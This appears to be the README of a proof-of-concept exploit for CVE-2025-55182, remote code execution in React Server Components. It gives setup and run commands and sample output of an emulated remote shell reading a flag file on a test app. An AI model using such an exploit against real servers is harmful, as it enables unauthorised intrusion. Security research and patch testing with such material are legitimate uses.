
Remote code execution for React Server Components 19.0.0 - 19.2.0
Proof of concept exploit for CVE-2025-55182. When successful, it will emulate a shell on the remote target over HTTP-POST requests. Works with both HTTP and HTTPS, but skips any certificate checks. Only supports directory changes with absolute paths.
# Install systemwide
pipx install requests
# Only install in current directory
python -m venv .
. bin/activate
pip install requests
python3 ./CVE-2025-55182.py 'https://example.notatld:1337/'
When successfully run, the output should look something like this:
╰─$ python CVE-2025-55182.py http://localhost:1337/
CVE-2025-55182 - PoC Shell
Author: Least-Significant-Bit
Hint: Type 'exit' or 'quit' to exit.
/app/.next/standalone $> cd /app
/app $> ls
app
flag.txt
next-env.d.ts
next.config.mjs
node_modules
package-lock.json
package.json
postcss.config.mjs
public
tailwind.config.ts
tsconfig.json
/app $> cat flag.txt
EXAMPLE_TEST_FLAG